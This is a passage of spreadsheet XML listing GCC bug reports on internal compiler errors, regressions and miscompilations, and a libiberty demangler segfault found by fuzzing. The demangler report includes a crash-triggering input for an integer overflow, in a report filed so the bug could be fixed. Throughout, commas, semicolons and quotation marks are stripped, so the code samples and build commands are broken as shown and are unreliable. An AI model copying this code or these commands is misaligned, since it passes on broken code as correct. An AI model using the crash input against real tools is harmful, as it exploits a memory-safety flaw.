0x67dce1 cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:8754
0x67dce1 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4309
0x67e5da cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5969
0x681698 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x68232f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x682821 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x682ce5 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8162
Please submit a full bug report [etc.]
Maybe the compiler chokes on the fact that there are more braces brackets
and parentheses than letters in the code -)</t>
  </si>
  <si>
    <t>GCC-31331</t>
  </si>
  <si>
    <t>[avr] ICE on function attribute syntax for main()</t>
  </si>
  <si>
    <t>Program:
__attribute__ ((naked)) int main(void)
{
    return 0
}
Compiled with 4.1.1 for the AVR target:
Compiling C: test.c
avr-gcc -c -mmcu=atmega128 -I. -gdwarf-2 -DF_CPU=8000000UL -Os -funsigned-char -funsigned-bitfields -fpack-struct -fshort-enums -Wall -Wstrict-prototypes -Wa-adhlns=./test.lst  -std=gnu99 -Wundef -MMD -MP -MF .dep/test.o.d test.c -o test.o 
test.c:2: internal compiler error: in start_function at c-decl.c:6014
Please submit a full bug report
A program with the proper syntax compiles without error:
int main(void) __attribute__ ((naked))
int main(void)
{
    return 0
}</t>
  </si>
  <si>
    <t>GCC-14913</t>
  </si>
  <si>
    <t>[4.0 Regression] Prototypes in error messages have no space after const</t>
  </si>
  <si>
    <t>I received the following warning message which has the const keywords and 
the following identifiers run together: 
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran-debug/build/CarpetRegrid/centre.cc:  
In function `int CarpetRegrid::Centre(constcGH* constgh&amp; int int int  
constCarpet::jjvect&amp; constCarpet::jjvect&amp; constCarpet::jjvect&amp;  
constCarpet::jjvect&amp;  
__gnu_norm::vector  
std::allocator &gt; &gt; std::allocator&lt;__gnu_norm::vector&lt;bbox&lt;int  
3&gt; std::allocator &gt; &gt; &gt; &gt;  
std::allocator  
std::allocator &gt; &gt; std::allocator&lt;__gnu_norm::vector&lt;bbox&lt;int  
3&gt; std::allocator &gt; &gt; &gt; &gt; &gt; &gt;&amp;  
__gnu_norm::vector 3&gt;  
std::allocator 3&gt; &gt; &gt;  
std::allocator 3&gt;  
std::allocator 3&gt; &gt; &gt; &gt; &gt;&amp;  
__gnu_norm::vector &gt;  
std::allocator &gt; &gt; &gt;&amp;)':  
/home/eschnett/Calpha/Cactus/configs/einstein-gfortran-debug/build/CarpetRegrid/centre.cc:46:  
warning: comparison between signed and unsigned integer expressions</t>
  </si>
  <si>
    <t>GCC-82796</t>
  </si>
  <si>
    <t>[6/7/8 Regression] Private+equivalence in used module breaks compilation of pure function</t>
  </si>
  <si>
    <t>gfortran (multiple versions including 7.2.0 6.4.0 and 5.4.1) fails to compile the following code
===============================================================
MODULE EQ
  implicit none
  INTEGER :: N1
  INTEGER :: N2
  INTEGER DIMENSION(2) :: a
  EQUIVALENCE (a(1) N1)
  EQUIVALENCE (a(2) N2)
  COMMON /A/ a
END MODULE EQ
!--------------------------------------------------------------
module m
  use eq
  implicit none
  private
  type public :: t
    integer :: i
  end type t
end module m
!--------------------------------------------------------------
module p
  implicit none
contains
  pure integer function d(h)
    use m only: t
    implicit none
    integer intent(in) :: h
    d = h
  end function
end module p
===============================================================
As far as I can see (see also https://groups.google.com/forum/#!topic/comp.lang.fortran/9sC7kUje0Mc ) the pure function is not attempting to access the variables that are affected by the EQUIVALENCE in module EQ - what's more the function should not be allowed to have access to them since they are private.
Other compilers (intel nag) and older versions of gfortran (4.8.4. 4.9.3) do not complain about this and compile the code.
The compilation error is provided below.
===============================================================
$ gfortran-7 -v -c -std=f2008 foo.f90 -o foo.o
Using built-in specs.
COLLECT_GCC=gfortran-7
OFFLOAD_TARGET_NAMES=nvptx-none
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 7.2.0-12' --with-bugurl=file:///usr/share/doc/gcc-7/README.Bugs --enable-languages=cadac++gobrigdfortranobjcobj-c++ --prefix=/usr --with-gcc-major-version-only --program-suffix=-7 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --with-target-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 7.2.1 20171025 (Debian 7.2.0-12) 
COLLECT_GCC_OPTIONS='-v' '-c' '-std=f2008' '-o' 'foo.o' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/7/f951 foo.f90 -quiet -dumpbase foo.f90 -mtune=generic -march=x86-64 -auxbase-strip foo.o -std=f2008 -version -fintrinsic-modules-path /usr/lib/gcc/x86_64-linux-gnu/7/finclude -o /tmp/ccpUItgn.s
GNU Fortran (Debian 7.2.0-12) version 7.2.1 20171025 (x86_64-linux-gnu)
	compiled by GNU C version 7.2.1 20171025 GMP version 6.1.2 MPFR version 3.1.6 MPC version 1.0.3 isl version isl-0.18-GMP
warning: MPFR header version 3.1.6 differs from library version 3.1.5.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran2008 (Debian 7.2.0-12) version 7.2.1 20171025 (x86_64-linux-gnu)
	compiled by GNU C version 7.2.1 20171025 GMP version 6.1.2 MPFR version 3.1.6 MPC version 1.0.3 isl version isl-0.18-GMP
warning: MPFR header version 3.1.6 differs from library version 3.1.5.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
foo.f90:34:8:
     use m only: t
        1
Error: Common block member â€˜aâ€™ at (1) cannot be an EQUIVALENCE object in the pure procedure â€˜dâ€™
foo.f90:34:8:
     use m only: t
        1
Error: Common block member â€˜aâ€™ at (1) cannot be an EQUIVALENCE object in the pure procedure â€˜dâ€™</t>
  </si>
  <si>
    <t>ripero84</t>
  </si>
  <si>
    <t>GCC-46309</t>
  </si>
  <si>
    <t>optimization a==3||a==1</t>
  </si>
  <si>
    <t>$g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/eid-letni/opt/gcc/libexec/gcc/i686-pc-linux-gnu/4.6.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=/home/eid-letni/opt/gcc --enable-languages=cc++
Thread model: posix
gcc version 4.6.0 20101105 (experimental) (GCC) 
$uname -a
Linux eidletni 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
$g++ -O3 -c main.ii
func good_comp have optimiz without jump:
bool good_comp(int a int b)
{
    return (a==3)||(a==1)
}
asm with no jumps:
00000020 :
  20:	8b 54 24 04          	mov    0x4(%esp)%edx
  24:	83 fa 01             	cmp    $0x1%edx
  27:	0f 94 c0             	sete   %al
  2a:	83 fa 03             	cmp    $0x3%edx
  2d:	0f 94 c2             	sete   %dl
  30:	09 d0                	or     %edx%eax
  32:	c3                   	ret    
using same code with temps:
bool bad_comp(int a int b)
{
    bool tmp1 = (a==3)
    bool tmp2 = (a==1)
    return tmp1||tmp2
}
asm(with jump):
00000000 :
   0:	8b 54 24 04          	mov    0x4(%esp)%edx
   4:	b8 01 00 00 00       	mov    $0x1%eax
   9:	83 fa 03             	cmp    $0x3%edx
   c:	74 06                	je     14 
   e:	83 fa 01             	cmp    $0x1%edx
  11:	0f 94 c0             	sete   %al
  14:	f3 c3                	repz ret</t>
  </si>
  <si>
    <t>eidletni</t>
  </si>
  <si>
    <t>GCC-55353</t>
  </si>
  <si>
    <t>[asan] the flag for asan should match the one used in clang</t>
  </si>
  <si>
    <t>Currently gcc trunk uses -faddress-sanitizer
Clang has recently changed the flag to -fsanitize=address
(there was a data race between clang change and gcc review-commit cycle :)
We need to match the flags. 
Same applies to tsan (seems like it is not committed to gcc yet)</t>
  </si>
  <si>
    <t>konstantin.s.serebryany</t>
  </si>
  <si>
    <t>GCC-2533</t>
  </si>
  <si>
    <t>-fdump-translation-unit causes ICE</t>
  </si>
  <si>
    <t>Compiling any C++ file with -fdump-translation-unit causes
an ICE.
Release:
2001-04-09 snapshot
Environment:
Linux 2.4.2 i686 glibc-2.2.2
How-To-Repeat:
touch temp.cc
/opt/egcs-2001-04-09/bin/g++ -fdump-translation-unit=temp.tree temp.cc</t>
  </si>
  <si>
    <t>GCC-61880</t>
  </si>
  <si>
    <t>Linking with external functions in C does not work in GO when using gccgo while it works in gc</t>
  </si>
  <si>
    <t>Created attachment 33173
tiniest GOPATH demoing the problem (28 nonempty lines 6 in C 22 in GO including comments)
This is continuation of issue reported here: https://code.google.com/p/gofrontend/issues/detail?id=36
Since I have changed the test case to be extremely simple with no external references to any libraries or applications I am moving the bug here.
1. Demo of the issue:
        tar xvfz CGO_FALURE.tar.gz
        cd CGO_FALURE
        export GOPATH=`pwd`
        go run -compiler gccgo src/cgo_problem/demo.go
results in:
        # command-line-arguments
        /tmp/go-build280712483/cgo_problem/example.com/libdemo.a(_cgo_export.o): In function `Dummy':
        /tmp/go-build280712483/cgo_problem/example.com/demo/_obj/_cgo_export.c:5: undefined reference to `cgo_problem_example_com_demo.Cgoexp_Dummy'
        collect2: error: ld returned 1 exit status
2. Compare with the behavior of gc:
        go run -compiler gccgo src/cgo_problem/demo.go
results in:
        Address of function Dummy: 0x400f30
The issue can be worked around by renaming the example.com/demo package to example_com/demo
        mv src/cgo_problem/example.com src/cgo_problem/example.com
        sed -i 's/example[.]com/example_com/' src/cgo_problem/demo.go
3. The problem stems from:
The _cgo_export.h file that is emitted by cgo.
The first part of the name given to __asm__ macro is generated by the gccgoSymbolPrefix method here: http://golang.org/src/cmd/cgo/out.go#L985
Perhaps the runes that get emitted directly should include the dot '.' - it is the domain delimiter character which is reused in package names.
4. gcc versions 4.8 4.9 4.10 suffer from this issue:
4.8:
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.8.3/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-isl=/builddir/build/BUILD/gcc-4.8.3-20140624/obj-x86_64-redhat-linux/isl-install --with-cloog=/builddir/build/BUILD/gcc-4.8.3-20140624/obj-x86_64-redhat-linux/cloog-install --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.8.3 20140624 (Red Hat 4.8.3-1) (GCC) 
4.9:
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ashopov/WORK/GCC/libexec/gcc/x86_64-linux-gnu/4.9.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../configure --prefix=/home/ashopov/WORK/GCC --build=x86_64-linux-gnu --disable-browser-plugin --disable-libgcj --disable-libmudflap --disable-vtable-verify --disable-libunwind-exceptions --enable-checking=release --disable-bootstrap --enable-__cxa_atexit --enable-gnu-unique-object --enable-languages=cc++golto --enable-linker-build-id --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-linker-hash-style=gnu --with-system-zlib --with-tune=generic --enable-multiarch
Thread model: posix
gcc version 4.9.1 20140709 (prerelease) (GCC) 
4.10:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ashopov/WORK/GCC-TRUNK/libexec/gcc/x86_64-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ./configure --prefix=/home/ashopov/WORK/GCC-TRUNK --build=x86_64-linux-gnu --disable-browser-plugin --disable-libgcj --disable-libmudflap --disable-vtable-verify --disable-libunwind-exceptions --enable-checking=release --disable-bootstrap --enable-__cxa_atexit --enable-gnu-unique-object --enable-languages=cc++golto --enable-linker-build-id --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-linker-hash-style=gnu --with-system-zlib --with-tune=generic --enable-multiarch
Thread model: posix
gcc version 4.10.0 20140721 (experimental) (GCC) 
5. System is:
Linux ashopov-dev 3.15.6-200.fc20.x86_64 #1 SMP Fri Jul 18 02:36:27 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux - up to date Fedora x86_64 box
6. gc/go are:
golang-1.2.2-7.fc20.x86_64
7. Sadly I could not convert this to a test case since 'go test' does not allow using cgo.</t>
  </si>
  <si>
    <t>lists</t>
  </si>
  <si>
    <t>GCC-39302</t>
  </si>
  <si>
    <t>[meta-bug] bugs waiting for Copyright Assignment acknowledgemt for ARC International (UK) Ltd</t>
  </si>
  <si>
    <t>Before patches from ARC International (UK) Ltd can be reviewed it
must be verified that a valid copyright assignment is on file at the FSF.
This blocks a number of bugs where patches are available but cannot be reviewed.</t>
  </si>
  <si>
    <t>GCC-21745</t>
  </si>
  <si>
    <t>ICE during build of h8300 cross-compiler</t>
  </si>
  <si>
    <t>While building a cross-compiler on my Linux x86 box I got this error in the
middle of the libstdc++ build:
Command:
/usr/local/src/build-gcc/gcc/xgcc -shared-libgcc -B/usr/local/src/build-gcc/gcc/
-nostdinc++ -L/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/src
-L/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/src/.libs
-nostdinc -B/usr/local/src/build-gcc/h8300-hms/h8300s/normal/newlib/ -isystem
/usr/local/src/build-gcc/h8300-hms/h8300s/normal/newlib/targ-include -isystem
/usr/local/src/gcc-3.4.4/newlib/libc/include -B/usr/local/h8300-hms/bin/
-B/usr/local/h8300-hms/lib/ -isystem /usr/local/h8300-hms/include -isystem
/usr/local/h8300-hms/sys-include -ms -mn
-I/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include/h8300-hms
-I/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include
-I/usr/local/src/gcc-3.4.4/libstdc++-v3/libsupc++ -O2 -g -O2 -g -O2 -ms -mn
-fno-implicit-templates -Wall -W -Wwrite-strings -Wcast-qual
-fdiagnostics-show-location=once -c
../../../../../../gcc-3.4.4/libstdc++-v3/src/locale-inst.cc -o locale-inst.o
Error:
/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include/bits/locale_facets.tcc:
In member function `_InIter std::money_get::do_get(_InIter
_InIter bool std::ios_base&amp; std::_Ios_Iostate&amp; std::basic_string&lt;_CharT
std::char_traits std::allocator &gt;&amp;) const [with _CharT = char
_InIter = std::istreambuf_iterator &gt;]':
/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include/bits/locale_facets.tcc:702:
error: unrecognizable insn:
(insn 434 253 355 5
/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include/bits/basic_string.h:1465
(set (mem:SI (pre_dec:HI (reg/f:HI 7 sp)) [0 S4 A32])
        (reg:SI 7 sp)) -1 (nil)
    (nil))
/usr/local/src/build-gcc/h8300-hms/h8300s/normal/libstdc++-v3/include/bits/locale_facets.tcc:702:
internal compiler error: in extract_insn at recog.c:2083
If more information is needed I'll be glad to provide it.</t>
  </si>
  <si>
    <t>aarestad</t>
  </si>
  <si>
    <t>GCC-44433</t>
  </si>
  <si>
    <t>[meta-bug] --enable-build-with-cxx issues</t>
  </si>
  <si>
    <t>Issues to be fixed before --enable-build-with-cxx can be made the default.</t>
  </si>
  <si>
    <t>GCC-21955</t>
  </si>
  <si>
    <t>std::stringbuf vs. in_avail</t>
  </si>
  <si>
    <t>Basically in_avail for stringbufs is missing key bits.
#include 
#include 
#include 
double
test_stringstream()
{
  double result
  char* source = 1918
  std::stringstream s
  s &lt;&lt; source
  std::string tmp = s.str()
  std::streambuf* sb = s.rdbuf()
  int i = sb-&gt;in_avail()
  if (i)
    {
      s &gt;&gt; result
      std::cerr &lt;&lt; conversion result =  &lt;&lt; result &lt;&lt; std::endl
    }
  else
    {
      throw std::runtime_error(conversion failed)
    }
  return result
}
int main ()
{
  test_stringstream()
  return 0
}
I believe this to be a bug and quite unintentional. 
However it's pretty easily fixed.
This is a tracker from RH bugzilla 159408
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=159408</t>
  </si>
  <si>
    <t>GCC-484</t>
  </si>
  <si>
    <t>[Alpha Digital Unix 4.0] ice-on-legal-code</t>
  </si>
  <si>
    <t>sql_acl.cc:1367: Internal compiler error in `scan_region' at except.c:2566 
attempting to compile MySQL under Digital Unix 4.0d.
Occurs on both mysql-3.23.22-beta and mysql-3.22.32 (current release version)
Command:
gcc -DMYSQL_SERVER                      -DDEFAULT_MYSQL_HOME=\/pkg/contrib\
-DDATADIR=\/pkg/contrib/var\                        -DSHAREDIR=\/pkg/contr
ib/share/mysql\                       -DHAVE_CONFIG_H -I./../include         -
I./../regex                     -I. -I../include -I.. -I.    -D_LARGEFILE_SOURCE
 -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -O3 -DDBUG_OFF -O3  -fno-implicit-
templates -c sql_acl.cc
In file included from ../include/global.h:132
                 from mysql_priv.h:15
                 from sql_acl.cc:25:
/usr/include/alloca.h:71: warning: declaration of `void * alloca(int)'
/usr/include/alloca.h:71: warning: conflicts with built-in declaration `void * a
lloca(long unsigned int)'
sql_acl.cc: In function `int replace_column_table(THD * GRANT_TABLE * TABLE *
 const LEX_USER &amp; List &amp; const char * const char * unsigned int
 bool)':
sql_acl.cc:1367: Internal compiler error in `scan_region' at except.c:2566
Please submit a full bug report.
See  for instructions.
thanks
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Digital Unix 4.0d / gcc 2.95.2
How-To-Repeat:
Additional info to bug report 301...
sql_acl.cc:1367: Internal compiler error in `scan_region' at except.c:2566</t>
  </si>
  <si>
    <t>mkbowers</t>
  </si>
  <si>
    <t>GCC-70498</t>
  </si>
  <si>
    <t>Libiberty Demangler segfaults (3)</t>
  </si>
  <si>
    <t>Due to the inconsistent use of long and int for string/array length in cp-demangle.c there is an integer overflow that leads to a write access violation. The target crashes on an access violation at an address matching the destination operand of the instruction.
This error was found during fuzzing with a more efficient version of AFL.
How to reproduce:
$ valgrind c++filt _Z80800000000000000000000
==87985== Invalid read of size 1
==87985==    at 0x7C3DFC: d_unqualified_name (cp-demangle.c:1555)
==87985==    by 0x7CA9DF: d_name (cp-demangle.c:1399)
==87985==    by 0x7CC1A3: d_encoding (cp-demangle.c:1257)
==87985==    by 0x7D153C: cplus_demangle_mangled_name (cp-demangle.c:1172)
==87985==    by 0x7D153C: d_demangle_callback (cp-demangle.c:5894)
==87985==    by 0x7D153C: d_demangle (cp-demangle.c:5945)
==87985==    by 0x7D153C: cplus_demangle_v3 (cp-demangle.c:6102)
==87985==    by 0x75AB53: cplus_demangle (cplus-dem.c:865)
..
Segmentation fault
Root cause:
In cp-demangle.c sometimes length-variables are of type long e.g. when the length of an identifier is parsed in d_number. Other times they are of type int e.g. when actually parsing an identifier in d_identifier. Note that cp-demangle.h exports structs and methods with length-variables of type int.
Preparing a patch.</t>
  </si>
  <si>
    <t>boehme.marcel</t>
  </si>
  <si>
    <t>GCC-35713</t>
  </si>
  <si>
    <t>[4.4 Regression] invalid type for va_arg with _Decimal128</t>
  </si>
  <si>
    <t>Using va_arg with _Decimal128 for powerpc-linux results in an error
message followed by an ICE resulting in several new failing GCC
tests.
This testcase:
    void
    foo (int n ...)
    {
      __builtin_va_list ap
      _Decimal128 x
      __builtin_va_start (ap n)
      x = __builtin_va_arg (ap _Decimal128)
      __builtin_va_end (ap)
    }
results in these messages:
    elm3b145% /opt/gcc-nightly/trunk/bin/gcc -c va.c
    va.c: In function â€˜fooâ€™:
    va.c:3: error: type mismatch in binary expression
    unsigned char
    unsigned char
    unsigned int
    D.1240 = D.1239 | 1
    va.c:3: internal compiler error: verify_gimple failed
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
The failure becomes apparent with r133479 but it also happens with earlier
GCC sources configured with --enable-checking=types.
I plan to continue investigating this problem.</t>
  </si>
  <si>
    <t>GCC-16658</t>
  </si>
  <si>
    <t>errors compiling saxon xslt library</t>
  </si>
  <si>
    <t>I'm trying to use gcj to compile the saxon xslt java library (version 6.5.3)
from source.
gcj -v reports:
Reading specs from /opt/cross/i386/lib/gcc/i686-tw-linux-gnu/3.4.1/specs
Reading specs from
/opt/cross/i386/lib/gcc/i686-tw-linux-gnu/3.4.1/../../../../i686-tw-linux-gnu/lib/libgcj.spec
rename spec lib to liborig
Configured with: /home/jcpage/depot/mp/tools/gcc-3.4.1/configure
--target=i686-tw-linux-gnu --host=i686-pc-linux-gnu --prefix=/opt/cross/i386
--enable-languages=cc++java --disable-nls --enable-shared
--enable-threads=posix --enable-c99 --enable-long-long
--with-headers=/opt/cross/i386/i686-tw-linux-gnu/include
Thread model: posix
gcc version 3.4.1
The first error I run into is in the com.icl.saxon.om package (it actually
happens with all files in the package but I'll only include commands and output
for AbstractNode.java-the first source file):
with a cwd of src/com/icl/saxon/om I try to run:
gcj -Wno-deprecated -I./../../../../ -Ixml-apis/src -c AbstractNode.java -o
AbstractNode.o
and get the following error:
./AbstractNode.java:33: error: Class `com.icl.saxon.om.AbstractNode' already
defined in AbstractNode.java:33.
   public abstract class AbstractNode implements Node NodeInfo SourceLocator
DOMLocator {
                         ^
./AbstractNode.java:154: confused by earlier errors bailing out
I can work around that error by running the following command with a CWD of src/:
gcj -Wno-deprecated -Ixml-apis/src -c com/icl/saxon/om/AbstractNode.java -o
AbstractNode.o
After working around this for all files in the om package: I get the following
error in the com.icl.saxon.tree package:
When compiling ElementImpl.java:
gcj -Wno-deprecated -I./../../../../ -Ixml-apis/src -c ElementImpl.java -o
ElementImpl.o
ElementImpl.java: In class `com.icl.saxon.tree.ElementImpl':
ElementImpl.java: In method `com.icl.saxon.tree.ElementImpl.setNameCode(int)':
ElementImpl.java:48: internal compiler error: in expand_expr_real at expr.c:7090
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
all other files in the package build succesfully.  
running gcj with -save-temps only appears to generate .s files so I will
refrain from attaching any files unless specifically asked to.  
the saxon source I am using is available from
http://prdownloads.sourceforge.net/saxon/saxon6_5_3.zip in the source.zip
archive inside of the saxon6_5_3 archive.  
The xml-apis source that needs to be included in the classpath is available from
http://apache.mirrors.versehost.com/xml/commons/xml-commons-1.0.b2.tar.gz in the
xml-commons-1.0.b2/java/external/src/ subdirectory of the archive.</t>
  </si>
  <si>
    <t>jbarnett</t>
  </si>
  <si>
    <t>GCC-66685</t>
  </si>
  <si>
    <t>[6 Regression] conftest.c:16:1: internal compiler error: in as_a at is-a.h:192</t>
  </si>
  <si>
    <t>checking for hppa2.0w-hp-hpux11.11-gcc... /test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B/opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/lib/ -isystem /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/sys-include
checking for suffix of object files... configure: error: in `/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
make[2]: *** [configure-stage1-target-libgcc] Error 1
config.log:
configure:3462: /test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B
/opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-6.0/hppa2.0w-
hp-hpux11.11/lib/ -isystem /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/include -i
system /opt/gnu/gcc/gcc-6.0/hppa2.0w-hp-hpux11.11/sys-include    -o conftest -g
-O2   conftest.c  &gt;&amp;5
conftest.c: In function 'main':
conftest.c:16:1: internal compiler error: in as_a at is-a.h:192
 }
 ^
This is with reviosn 225078.</t>
  </si>
  <si>
    <t>GCC-15603</t>
  </si>
  <si>
    <t>Illegal program not detected 12.7(10) (generic parameter is visible shouldn't be)</t>
  </si>
  <si>
    <t>GNAT compiles the following illegal program.
generic
package P1 is
end P1
with P1
generic
   with package the_P1 is new P1 -- [1]
package P2 is
end P2
with P1
package new_P1 is new P1
with new_P1 P2
package P3 is
   package new_P2 is new P2(new_P1)
   package my_P1 renames new_P2.the_P1   -- ERROR: the_P1 is not visible
end P3
$ gnatchop -w p gnatmake p3
splitting p into:
   p1.ads
   p2.ads
   new_p1.ads
   p3.ads
gcc -c p3.ads
gcc -c new_p1.ads
gcc -c p2.ads
gcc -c p1.ads
Compilation finished at Wed Apr 14 19:11:19
12.7(10):
The visible part of a formal package includes the first list of
basic_declarative_items of the package_specification. In addition if
the formal_package_actual_part is () it also includes the
generic_formal_part of the template for the formal package.
Here the formal_package_actual_part at line [1] is not ()
therefore the_P1 is not part of P2's visible part.  Here is an example
where gnat correctly applies this rule:
generic
   i: integer
package P2 is
end P2
with P2
package P3 is
   package new_P2 is new P2(3)
   x: integer renames new_P2.i
end P3
$ gnatchop -w p gnatmake p3
splitting p into:
   p2.ads
   p3.ads
gcc -c p3.ads
p3.ads:5:29: i is not a visible entity of new_P2
gnatmake: p3.ads compilation error</t>
  </si>
  <si>
    <t>GCC-36201</t>
  </si>
  <si>
    <t>[4.4 Regression] NVR in the front-end causes missed optimization later on ( thought to alias arguments)</t>
  </si>
  <si>
    <t>Testcase:
#define SIZE 1024
While looking into why manually SRA'd testcase worked better. I found this interesting problem.
Take:
struct a
{
  long long b
  a()
}
a f(a &amp;g a &amp;h)
{
  int i
  a res = g
  for (i = 0 i &lt; SIZE i++)
    res.b += h.b
  return res
}
at -O2 we change res here to  so we have  in the inner loop.  If we supply -fno-elide-constructors which disables NVR in C++ front-end we get good code of doing loop based Copy Prop (SCEV copy prop) as we able to pull out res.b.  The issue is that we say h can alias  but we don't say the same thing for res though.</t>
  </si>
  <si>
    <t>GCC-7375</t>
  </si>
  <si>
    <t>GCC 3.2 crash while compiling XFree86 4.02</t>
  </si>
  <si>
    <t>gcc crashes while compiling XFree86 4.02 on FreeBSD 4.6-RELEASE with -march=athlon -O2 -malign-double. -O3 is also failing.
rm -f miPck1Prim.o
LD_LIBRARY_PATH=../../../../../../exports/lib cc -pipe -fomit-frame-pointer -O2 -malign-double -march=athlon   -ansi -pedantic -Dasm=__asm -Wall -Wpointer-arith   -fno-merge-constants -I. 	-I../include 	-I../../../../../../exports/include/X11 	-I../../../include 	-I../../../../../../programs/Xserver/include  -I../../../../../.. -I../../../../../../exports/include   -DCSRG_BASED -DSHAPE -DXINPUT -DXKB -DLBX -DXAPPGROUP -DXCSECURITY -DTOGCUP  -DXF86BIGFONT -DDPMSExtension   -DPANORAMIX  -DRENDER  -DGCCUSESGAS -DAVOID_GLYPHBLT -DPIXPRIV -DSINGLEDEPTH -DXFreeXDGA -DXvExtension -DXFree86LOADER  -DXFree86Server -DXF86VIDMODE -DXvMCExtension  -DSMART_SCHEDULE -DBUILDDEBUG -DX_BYTE_ORDER=X_LITTLE_ENDIAN -DNDEBUG  -DFUNCPROTO=15 -DNARROWPROTO  -DIN_MODULE -DXFree86Module    -c miPck1Prim.c
miPck1Prim.c: In function `CheckFAreaPick1':
miPck1Prim.c:337: Internal compiler error in ix86_secondary_memory_needed at config/i386/i386.c:12827
Please submit a full bug report
Release:
3.2 20020518
Environment:
This is FreeBSD 4.6-RELEASE.
How-To-Repeat:
Compile xc/programs/Xserver/PEX5/ddpex/mi/level1/miPck1Prim.c
with -O2 -fomit-frame-pointer -malign-double -march=athlon</t>
  </si>
  <si>
    <t>GCC-16099</t>
  </si>
  <si>
    <t>Wrong output from legal program</t>
  </si>
  <si>
    <t>with text_io
procedure Test_248684 is
   type T1 is delta 1.0 range -256.0..255.0
begin
   for i in 1..10 loop
      declare
         x: T1 := T1(i)
         y: T1 := (-2.0) * x
      begin
         if y = -2.0 * x
         then text_io.put_line(passed)
         else text_io.put_line(failed:  
         end if
      end
   end loop
end Test_248684
The program should print passed but it prints:
failed:  2.0
failed:  4.0
failed:  6.0
failed:  8.0
failed:  10.0
failed:  12.0
failed:  14.0
failed:  16.0
failed:  18.0
failed:  20.0</t>
  </si>
  <si>
    <t>GCC-40718</t>
  </si>
  <si>
    <t>Invalid code produced with -foptimize-sibling-calls</t>
  </si>
  <si>
    <t>The following program will fail.
gcc -S -O1 -foptimize-sibling-calls bug.c
bug.c:
============================================
#define stdcall __attribute__((__stdcall__))
struct S {
    void (stdcall *f)(struct S *)
    int i
}
void stdcall foo(struct S *s)
{
